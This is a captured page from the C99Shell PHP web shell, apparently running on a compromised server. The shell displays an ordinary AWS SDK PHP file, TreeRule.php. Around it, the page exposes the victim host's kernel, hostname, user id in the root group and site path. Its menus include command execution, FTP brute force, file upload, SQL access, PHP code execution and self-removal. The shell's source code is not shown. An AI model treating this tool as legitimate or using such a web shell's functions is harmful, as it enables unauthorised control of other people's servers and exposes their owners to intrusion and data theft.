!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/aws/aws-sdk-php/src/EndpointV2/Rule/   drwxr-xr-x
Free 28.61 GB of 117.98 GB (24.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     TreeRule.php (1.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Aws\EndpointV2\Rule;

use 
Aws\EndpointV2\Ruleset\RulesetStandardLibrary;

class 
TreeRule extends AbstractRule
{
    
/** @var array */
    
private $rules;

    public function 
__construct(array $definition)
    {
        
parent::__construct($definition);
        
$this->rules $this->createRules($definition['rules']);
    }

    
/**
     * @return array
     */
    
public function getRules()
    {
        return 
$this->rules;
    }

    
/**
     * If a tree rule's conditions evaluate successfully, iterate over its
     * subordinate rules and return a result if there is one. If any of the
     * subsequent rules are trees, the function will recurse until it reaches
     * an error or an endpoint rule
     *
     * @return mixed
     */
    
public function evaluate(
        array 
$inputParameters,
        
RulesetStandardLibrary $standardLibrary
    
)
    {
        if (
$this->evaluateConditions($inputParameters$standardLibrary)) {
            foreach(
$this->rules as $rule) {
                
$inputParametersCopy $inputParameters;
                
$evaluation $rule->evaluate($inputParametersCopy$standardLibrary);
                if (
$evaluation !== false) {
                    return 
$evaluation;
                }
            }
        }
        return 
false;
    }

    private function 
createRules(array $rules)
    {
        
$rulesList = [];

        forEach(
$rules as $rule) {
            
$ruleType RuleCreator::create($rule['type'], $rule);
            
$rulesList[] = $ruleType;
        }
        return 
$rulesList;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--